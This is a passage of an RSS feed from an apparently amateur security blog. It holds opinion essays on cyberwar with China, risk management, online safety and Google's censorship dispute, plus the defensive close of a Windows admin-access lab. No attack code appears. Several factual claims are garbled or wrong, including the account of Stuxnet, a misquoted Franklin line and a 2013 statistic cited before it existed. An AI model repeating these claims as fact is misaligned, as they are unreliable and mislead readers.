&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;The lesson of this lab is not to teach anybody to break rules but to make users aware of the dangers of big profit-glutton corporations like Microsoft.&amp;nbsp; You can help secure your computer from this attack by 1) Disabling CD-ROM/DVD-ROM and USB External Storage, 2) Putting a BIOS password and 3) Removing CD-ROM, DVD-ROMs or buying a computer with no USB connections :-D&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Big cheers to RS who made me aware of this security vector.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;I hope you enjoyed it!&lt;/span&gt;</description><link>https://unsecuritynow.blogspot.com/2013/10/how-can-10-year-old-have-administrator.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-OX2WWQqFyDA/UlTgWPI9ooI/AAAAAAAAANg/26BsdUCppBA/s72-c/1.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-243726185705869834</guid><pubDate>Wed, 27 Feb 2013 17:05:00 +0000</pubDate><atom:updated>2015-04-16T06:48:49.486-05:00</atom:updated><title>Shanghai Hackers and The “Obscured” Cyber-War?</title><description>&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Technology plays a huge part in our lives.  Every day we are 
consciously and unconsciously concerned with it, mostly because we 
grew up with it, are very used to it, and all count on it 
every day.  Most consumers think technology is our friend, but what does 
the government think of technology, and how does it use it?  You will be 
amazed at how different the two perspectives are.  While regular consumers are 
anxiously waiting for the next “cool gadget” with built-in biometric 
technology to come out, the US government is fighting against huge 
power outages, Denial of Service attacks, network traffic sniffing, 
unauthorized backdoor access and other hacking techniques coming mainly 
from China.  This interesting contrast reflects how technology can be 
used for good and also for bad.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyBiqwcOUZTJyS0VGxbB2PX6X4aVifZBXsPTLXclzFlBcfJcf2hv6cQ_mRP0W5TAD9LvFeIh8SJS2jFPktdF6PCZKCFdJNmc2Bc18gqB4R-2BLF0igCQ_fwAOgQFD-usIJfXFC-hEdWLKm/s1600/cyberwar_large.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyBiqwcOUZTJyS0VGxbB2PX6X4aVifZBXsPTLXclzFlBcfJcf2hv6cQ_mRP0W5TAD9LvFeIh8SJS2jFPktdF6PCZKCFdJNmc2Bc18gqB4R-2BLF0igCQ_fwAOgQFD-usIJfXFC-hEdWLKm/s200/cyberwar_large.jpg&quot; height=&quot;173&quot; width=&quot;200&quot; /&gt;&lt;/a&gt; Government DOSed, defaced 
websites taken down, oil-rig computers infected by malware, huge 
botnets of zombie university computers attacking government 
systems, spying on the Wall Street Journal and leaking national 
top-secret documents to the whole world, using SQL injection to publish a 
whole governmental database (user credentials) on the web, even using Google 
to obtain social-security numbers of Americans:  these are all examples of a 
current “catastrophic cyber-war”, also known as the new “virtual Pearl 
Harbor”  
(http://search.proquest.com.proxy.itt-tech.edu/docview/1284133751/abstract?source=fedsrch&amp;amp;accountid=27655).
  The news is making all of us afraid of a cyber war, but who is 
attacking whom?  Who are the suspected victims?  Who are the targets?  
What are the allegations?  And the most important:  Where are they 
located?  All these questions are making people afraid, hiding the 
truth.  The truth is plain and simple.  We should fear nothing more 
than governments attacking governments all around the globe.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The US government is recruiting, going from 800 to 5,000 security 
specialists and gray-hat hackers, to help governments steal data, 
disrupt operations, and play a cat-and-mouse game which never ends.  
“[Government fighting government with virtual weapons] is the most 
dangerous and concerning technological threat in our lives” -Bruce 
Schneier.  We are all aware of the fact that China is attacking the 
US government.  According to Syndigate.info, “16 percent of observed 
cyber attacks came from China in the second quarter of the year” 2013 
(http://search.proquest.com.proxy.itt-tech.edu/docview/1283496982/citation?source=fedsrch&amp;amp;accountid=27655).
  Meanwhile, the government has been tracking China (its suspected attacker) 
ever since China started to see the U.S. as the arch-enemy, due to the 
fact that Bush started the war in the Middle East.  As for proof, there 
is plenty:  several US government entities (NSA, Pentagon, White House, 
etc.), newspapers (Wall Street Journal), credit-card companies 
(MasterCard, VISA), even really popular sites such as Google and 
Facebook 
(http://www.ehackingnews.com/2013/02/how-researcher-hacked-facebook-oauth-to.html).&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiowu2TW1rPolWT9eWzkwEmDLMfvUI7L8XLW_-G8ZtnjCMWYgObkERSQWW_NI2mkNO88n_JFkLOxiuLCP99LOmdDezeMV6QCmNZYpYkgreL49F_c4DjgXS03JyZILokxKwK9eZSJLSRki6B/s1600/spying.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiowu2TW1rPolWT9eWzkwEmDLMfvUI7L8XLW_-G8ZtnjCMWYgObkERSQWW_NI2mkNO88n_JFkLOxiuLCP99LOmdDezeMV6QCmNZYpYkgreL49F_c4DjgXS03JyZILokxKwK9eZSJLSRki6B/s320/spying.png&quot; height=&quot;244&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
While the U.S. is being attacked from China, the US is monitoring its 
most successful invention:  Stuxnet.  Stuxnet is a military worm which 
was invented by the US Government and Israelis to spy on “terrorists”. 
 Stuxnet was invented in 2006 to make the US aware of other 
governments&#39; plans, and to spy on whoever they would like.  It has been a 
success because it is really difficult to detect and is infecting 
thousands of computers worldwide, acting stealthily in order to 
have the least noticeable behavior possible.  Other than Stuxnet, which 
has become public, who knows what other “stuxnets” are out there, 
also going unnoticed, from other governments...&lt;br /&gt;
&lt;br /&gt;
According to 
Bruce Schneier in a keynote at Internetdagarna 2011, the two things that 
are really difficult to know about a cyber attack are “who 
is attacking and why, and that is what makes cyber-defense so 
difficult”.  He also said that with today&#39;s technology, anybody (even a 
kid) can do serious damage to a computer connected to the internet, 
including government websites, using SQL injection techniques, launching 
DOS attacks and even guessing (brute-forcing) a default password set on a 
router sitting elsewhere, configured by a negligent system administrator.  The risk is out there and, in line with 
the attack vectors, new rules, protocols and procedures are being put in 
place by governments (Government urged to set cyber standards:  
http://search.proquest.com.proxy.itt-tech.edu/docview/1298835132/abstract?source=fedsrch&amp;amp;accountid=27655).
  Even though some regulations might seem OK to diminish (not prevent) 
cyber terrorism, little by little our freedoms are at stake.  For that 
reason a good, solid standard procedure should be put in place which 
makes us feel safer and actually makes us safer.  Security is a 
trade-off.  One has to risk something to get security back, but what you 
can never, and I mean NEVER, trade for security is freedom.  Just like 
Benjamin Franklin once said “One that trades security for freedom, does 
not deserve security nor freedom”.  So what approach do we choose to be 
more secure not only from cyber-vandals and script-kiddies but also 
from the governments?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
According to Antone Gonsalves 
(February 22nd, 2013, 
http://readwrite.com/2013/02/22/no-cyberwar-with-china), cyber-war is 
not here yet because “Real cyberwar would start with an attack that 
destroys something valuable or vital, kills people, or both.”  Does it 
really take killing people and destroying vital resources to make a real cyber-war?  I 
think it is a matter of perspective and with time we will realize that 
cyber-wars will be more human-like wars.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxOxKWlVr0VdWfY74Q2RTyDsazWZHWFd7klFsh2AhmOBqoWP-YaQPrlRFqN49raZYZL7lA4MtPAIPgKu5r7AygSzQDz6e0PoFHKQ9Ly8ly555Zd-28wZXu-7Xqx_bzukETu8wgfYimtrYu/s1600/wiki.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxOxKWlVr0VdWfY74Q2RTyDsazWZHWFd7klFsh2AhmOBqoWP-YaQPrlRFqN49raZYZL7lA4MtPAIPgKu5r7AygSzQDz6e0PoFHKQ9Ly8ly555Zd-28wZXu-7Xqx_bzukETu8wgfYimtrYu/s200/wiki.jpg&quot; height=&quot;149&quot; width=&quot;200&quot; /&gt;&lt;/a&gt; I believe a 
way to prevent cyber terrorism is to stop being afraid of the news and what 
the media and governments say.  The main goal for a terrorist is to 
“make terror”.  According to the Merriam-Webster dictionary, terrorism is 
“the systematic use of terror especially as a means of 
coercion” (http://www.merriam-webster.com/dictionary/terrorism).  I 
strongly believe in reinforcing general policies, such as military 
control, instead of focusing on every power grid in the US and skyrocketing 
expenses for useless outcomes.  Another example of protecting 
society from cyber attack and also physical attack is to reinforce rules 
and regulations in schools instead of putting additional guards in 
every school in the country to prevent sad kids from shooting everybody 
during class.  The point is that it is mostly psychological.  It 
is true that every day more and more websites, databases, organizations, 
governments and financial institutions are being breached and 
posted on Pastebin and their own sites for everyone to see (for example 
Anonymous and Wikileaks).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
What is important is to 
realize that it is more psychological than fact, and to put general 
solutions and countermeasures to the threats into perspective instead of being too 
specific and “micro-managing” things, because we will fail most of the 
time.  It is also important to note that security relies on two 
factors:  feeling secure (psychological) and being secure (facts).  It 
is totally useless to rely on the most expensive and best-configured 
firewalls if you don&#39;t train your employees not to divulge important 
information and keep them happy so no one goes “to the other 
side of the road” and sells you out just like Bradley Manning.  The most 
important thing is to be educated and to live a little bit more carefree. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sources:  &lt;br /&gt;
&lt;br /&gt;
Hackers take down U.S. government website by Xinhua News Agency - CEIS [Woodside] 26 Jan 2013. &lt;br /&gt;
http://search.proquest.com.proxy.itt-tech.edu/docview/1284133751/abstract?source=fedsrch&amp;amp;accountid=27655 &lt;br /&gt;
Chinese cyber attacks on Western firms, governments &#39;growing&#39;: Experts by Asian News International [New Delhi] 02 Feb 2013. &lt;br /&gt;
http://search.proquest.com.proxy.itt-tech.edu/docview/1283496982/citation?source=fedsrch&amp;amp;accountid=27655 &lt;br /&gt;
Government urged to set cyber standards Press, Jordan. The Gazette [Montreal, Que] 22 Feb 2013 &lt;br /&gt;
http://search.proquest.com.proxy.itt-tech.edu/docview/1298835132/abstract?source=fedsrch&amp;amp;accountid=27655 &lt;br /&gt;
&lt;br /&gt;
How researcher Hacked Facebook Oauth To Get Full Permission On Any Facebook Account &lt;br /&gt;
Reported by Sabari Selvan on Friday, February 22, 2013 &lt;br /&gt;
http://www.ehackingnews.com/2013/02/how-researcher-hacked-facebook-oauth-to.html &lt;br /&gt;
U.S. presents plan against industrial cyber-espionage: US GOVERNMENT by EFE News Service [Madrid] 20 Feb 2013. &lt;br /&gt;
http://search.proquest.com.proxy.itt-tech.edu/docview/1289100384/abstract?source=fedsrch&amp;amp;accountid=27655 &lt;br /&gt;
&lt;br /&gt;
Why We&#39;re Not In A Cyberwar With China by Antone Gonsalves February 22nd, 2013 &lt;br /&gt;
http://readwrite.com/2013/02/22/no-cyberwar-with-china &lt;br /&gt;
&lt;br /&gt;
Bruce Schneier - Keynote at Internetdagarna 2011 http://www.youtube.com/watch?v=dhzk9ZDhObw &lt;br /&gt;
&lt;br /&gt;
Webster Dictionary:  Terrorism Definition </description><link>https://unsecuritynow.blogspot.com/2013/02/shanghai-hackers-and-obscured-cyber-war.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyBiqwcOUZTJyS0VGxbB2PX6X4aVifZBXsPTLXclzFlBcfJcf2hv6cQ_mRP0W5TAD9LvFeIh8SJS2jFPktdF6PCZKCFdJNmc2Bc18gqB4R-2BLF0igCQ_fwAOgQFD-usIJfXFC-hEdWLKm/s72-c/cyberwar_large.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-3503812747318803735</guid><pubDate>Thu, 08 Apr 2010 16:52:00 +0000</pubDate><atom:updated>2010-04-08T11:57:46.667-05:00</atom:updated><title>Risk Management</title><description>The principles of keeping a system secure are as old as information itself.  As long as information has been around, ways of preventing information from reaching unwanted hands have been strongly enforced.  Advances in technology make systems more vulnerable to different methods of attack, also known as vectors.  By the time a system administrator tries to find out what went wrong with the system, sometimes it is too late.  For this reason, you must be aware of the latest technology involved in your field.  Ways of keeping systems secure are changing every day but principles will never change.  Some principles are straightforward to understand and to perform because they do not require much technical background.&lt;br /&gt;&lt;br /&gt;    One of the most important concepts of data security is availability.  How can something be secured if it has been deleted due to a weather incident, human negligence or a malicious act?  The first step is to back up data regularly.  Data backup is perhaps the oldest way of preserving data.  There are different categories of backups:  full, differential, incremental and delta backup.  
They differ in the amount of data preserved and when it is preserved.  The second step to prevent data disasters is to have the proper equipment.  Having a UPS (uninterruptible power supply), proper job practices, such as not bringing food to the workstations, and policies helps an organization to prevent data disaster.&lt;br /&gt;&lt;br /&gt;    The disaster recovery process has many methods which help an organization preserve its data and not endanger it negligently.  Other than making proper backups and using proper equipment and procedures, there are also other ways that blend into the same process.  Anticipating risks, planning a strategy, and having a post-disaster plan help the organization to act accordingly in such an event.  There are two kinds of risk management:  quantitative and qualitative.  Quantitative risk management determines the impact of threats by providing clients with advice, knowledge, and tools necessary to adopt innovations.  Qualitative risk management is the separation or categorization of risks.  They are categorized in three ways:  low, medium and high, following a scale from one (the least severe) to ten (the most severe).  Some of these scales rely on models.  Threats can be divided into categories as well.  They can be natural, physical, network, human and eavesdropping threats.  One must understand that those threats are equally important.  There are no less or more important threats; they are all the same because they all risk critical destruction of data.  Even though a company might disagree with this concept, I understand why.  A company with a limited budget cannot spend time fixing every hole that might be possible in a system.  It can only fix those holes it sees as the most imminent.  &lt;br /&gt;&lt;br /&gt;    Lastly, the people aware of the security holes vary from company to company, but I personally think it must be done accordingly and very cautiously.  
Critical information in the wrong hands can lead to more hands on that vulnerability and might lead to total disaster.  Only certain personnel must be told about the security vulnerabilities and/or breaches and be given a solution.  If no one is able to determine what went wrong, they will be less likely to know what to do to fix it.  Some white-hat hacker organizations try to break into corporate systems and offer help to fix them.  In a movie I watched yesterday called “En Busca de Los Hackers” (Seeking for Hackers) – Spanish version, a group of Spanish white hat hackers said that offering themselves to help companies with no hard evidence that somebody has broken into their system does not work.  Every company has turned them down.  The only method, for them, is the illegal approach.  They break into the system first, put the flaws on a disc explaining how they found them and present it to companies for hire.  1 out of 9 companies hired them.  No wonder there are vulnerable systems all around the world.  If people, including corporations, have that fear of hackers, what can they do to make their systems better?  Of course, there are bad people out there, but not everybody who calls themselves a hacker is really what they are.&lt;br /&gt;&lt;br /&gt;    In this cyber world full of vulnerabilities it is hard to know who is on which side of the road.  The only solution for a company is to back up its data daily; that way, if it ever loses something, it only loses the revenue of a day’s worth of work, thus controlling how much money it might lose.  It is not a matter of if, it is a matter of when.  Every system in this world has been compromised at least once in its history, which means no system is a silver bullet for an organization.  There are security bases and procedures of course, and they try to minimize the risks as much as possible to save company time and critical data.  
Only remember one thing:  anybody with proper knowledge, a computer connected to the Internet and time can break into ANY system.  One of the reasons is that companies do not encrypt data that goes through the networked medium.  Companies seek flexibility and convenience, and these have a price.  The price might be more than what they were looking to achieve, and the price is their lost privacy.&lt;br /&gt;&lt;br /&gt;Sources:&lt;br /&gt;&lt;br /&gt;http://www.it-observer.com/best-practices-securing-your-enterprise.html&lt;br /&gt;&lt;br /&gt;http://en.wikipedia.org/wiki/Risk_management&lt;br /&gt;&lt;br /&gt;“En Busca de los Hackers” – Seeking for Hackers (Spanish Movie)</description><link>https://unsecuritynow.blogspot.com/2010/04/risk-management.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-330208889696713250</guid><pubDate>Thu, 01 Apr 2010 18:49:00 +0000</pubDate><atom:updated>2010-04-01T15:20:54.442-05:00</atom:updated><title>The Fragile Web</title><description>Staying secure over the Internet is almost virtually impossible.  Even though total security is completely impossible, there are ways to minimize the risks.  Prevention is half of the equation; the other half must be secure practices.  The more exposure we get as computer users, the more security-driven most of us become.  If you are not worried about privacy because you use Linux or Mac, you still should be.  Non-encrypted communication, social engineering and online scams don’t discriminate between operating systems, making you just as vulnerable as Windows users. &lt;br /&gt;&lt;br /&gt;    It is harder to stay secure in the 21st century digital era because there are more flexibility options, and more temptations over the Internet.  
Having a non-encrypted connection might expose your data to the wrong eyes, risking your privacy, even though you might think you are safe enough by having an up-to-date antivirus installed on your computer and scanning it every day.  Also, having an IDS on your home computer, as well as a corporate firewall, might not help a lot. I think leveling the risks with cost is the best way to implement security.  Why waste a lot of money on professional-grade tools if the threats in a home environment are not as important as in a corporation which holds top secret information?  &lt;br /&gt;&lt;br /&gt;    Leveling risks with cost determines whether you really should spend money and time on implementing such a system.  Having a personal firewall might only help if the user is security conscious and is willing to spend time and effort on checking every process and communication that is going through the computer every time a pop-up window appears.  It is worthless to have top-notch technology if the user is not going to spend time on checking, and in this case, a user has to spend time and effort setting up firewall rules in order to minimize risks and false positives on a system.&lt;br /&gt;&lt;br /&gt;    Also, it is worth mentioning that a personal firewall and up-to-date anti-virus and anti-spyware are not the only things needed.  It is also recommended that those who do transactions online and send important e-mails use an encrypted connection.  The use of VPNs is widely known among companies, but what about home users?  Is the risk not the same, or at least similar, for a corporation and for a home user who is managing his online banking?  It only takes someone making a targeted attack on you to have your identity stolen.  The best way to prevent this is “abstinence”.  Try not to do financial stuff online.  That way, corporations will likely change their online policies and try to improve the system so more people could use it. It all comes down to money. 
This method will negotiate with corporations, thus making them change their strategy.  For example, Verizon (Slashdot website) will charge an extra $25 to make online payments more secure.  I agree with their strategy over the phone using a one-time password for purchase confirmation, but I don’t agree with paying more to get a security improvement they should have done in the first place.  Security must be provided with the service at the same rate.  &lt;br /&gt;&lt;br /&gt;    Even though paying with phone password confirmation might seem a more secure way to do online payments, there are risks in phones as well.  The only risk I can think of about phones is that users can put personal information about contacts on them.  If the phone is lost or stolen, important sensitive information can be gathered.  For example, BlackBerries can not only be traced with a built-in GPS system, but the Facebook application also does not time out after X minutes or even days of inactivity.  That means the user might have the Facebook application logged in for weeks or even months, and if the phone is lost or stolen, a bunch of other (internal) information can be taken from and about your contacts.  When technology advances and goes mobile, that is when the consumer must be more aware of risks, because now information is not only wired, communicated in encrypted and non-encrypted form.  Now information is also being transmitted over the air (largely non-encrypted) and it can be eavesdropped on by any person.  That is where Man-in-the-Middle attacks come into play.  &lt;br /&gt;&lt;br /&gt;    Not only phones, but also other over-the-air communication media are vulnerable and susceptible to attack.  Even though many people might think Man-in-the-Middle attacks take a tremendous amount of effort, there is still an easy way to pull it off.  That way is by ARP poisoning using an open source tool called Cain &amp; Abel.  (irongeek website).  
With this method, it is very easy for a knowledgeable person (hacker?) to get his hands dirty on your personal information in places such as cyber-cafes, airports, McDonald’s and some convenience stores.  &lt;br /&gt;&lt;br /&gt;    Having the most flexibility possible and the most security possible at once is impossible.  You cannot have both.  While some people prefer convenience and flexibility over security, a wiser choice might be to try to achieve both at a certain level to minimize the risks of being hacked.  In this high-tech world, doing our everyday chores while going mobile might seem dangerous.  This is the time to think wisely about our decisions.  Come on! We can do better America!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sources&lt;br /&gt;Verizon Strategy:  http://games.slashdot.org/story/10/03/22/2141205/Verizon-Set-To-Launch-Mobile-Payment-Service?art_pos=1&lt;br /&gt;&lt;br /&gt;Cain &amp; Abel:  http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning</description><link>https://unsecuritynow.blogspot.com/2010/04/how-to-stay-secure-over-internet.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-8108319938882582007</guid><pubDate>Wed, 31 Mar 2010 19:54:00 +0000</pubDate><atom:updated>2010-04-01T15:25:12.791-05:00</atom:updated><title>Struggle VS Google and China</title><description>Culture is what divides each nation.  Culture can make technology change the way it is wanted.  Without culture, a society can lose its richness and blend into another.  Culture is what we have inside and cannot describe, because it is part of our personality and the rules we obey in our daily lives.  When culture is violated, we feel like we are being harassed and having our dignity taken away.  
When business agreements influence the culture and principles of a nation, that is where the problem arises.&lt;br /&gt;&lt;br /&gt;    Google is well known as the giant of online searches.  Anybody can access their own country’s version of Google from their own machines.  For example, if you are in Ukraine, the site Google.com will be redirected to the Ukrainian version of Google.  Google had an agreement with China.  The agreement was that Google would provide fast searches inside the Big Firewall of China but with censorship on them, so the Chinese nation wouldn’t be able to start a political revolution aided by the Internet.  We all know China is a communist country, and communist governments limit the availability of information they consider “not suitable” for their nation to have access to.&lt;br /&gt;&lt;br /&gt;    When Google took away censorship, China’s government and some Chinese people felt their culture and life were violated.  I do not know the reason Google took away censorship, but I know that was not a smart move.  I truly believe that if you really want business from a foreign country, you have to know their laws and not try to break them.  For example, at a party a DJ has to play the music people want to hear, not what he wants to hear.  Even though the DJ might not like the music, he still has to play it.  He will get paid for it, but if he disobeys and does whatever he wants, the clientele will be severely pissed at him.  That is what happened with the Chinese government, and communists.  Many activists hacked into Google’s headquarters e-mail accounts and systems to rebel against such a bad act.  Google kept on reacting badly to the response of the Chinese nation, so havoc fell from the sky.  
The Chinese government says Google violated their agreement, so Google did something they thought would solve the problems, even though it did not.&lt;br /&gt; &lt;br /&gt;    Google moved (redirected) the Chinese version of Google to the Hong Kong version, and that is a problem, the same problem they had before.  Chinese users will try to visit Google and still get an uncensored version of Google from Hong Kong.  The Big Firewall of China is broken.  It is broken for two reasons.  Users can access any sites they want by going around the Big Firewall in two ways:  Google.hk and proxy servers.  Maybe Google might help China by removing the redirection, but I don’t think they will because they want money.  As for proxy servers, there might be underground sites made by the Chinese underground mafia which could provide users with proxy servers that let them connect to any site they want.  &lt;br /&gt; &lt;br /&gt;    Whichever way they choose, the Big Firewall will always be broken, thus letting unsolicited information leak through it.  Nothing is perfect, much less technology.  We all know that the Internet is one of the most vulnerable systems in the world because it is very complex and it would take an unlimited amount of time to patch every hole in it.  We have special gateways, proxy servers, VPNs, Tor software, anonymizer sites and protocols that can be used to bypass any sort of security that might get in our way.&lt;br /&gt;&lt;br /&gt;Sources&lt;br /&gt;&lt;br /&gt;http://www.upi.com/Daily-Briefing/2010/03/23/Google-vs-China/UPI-93351269347903/&lt;br /&gt;http://techcrunch.com/2010/01/12/google-china-attacks/&lt;br /&gt;http://www.torproject.org/</description><link>https://unsecuritynow.blogspot.com/2010/03/struggle-vs-google-and-china.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item></channel></rss>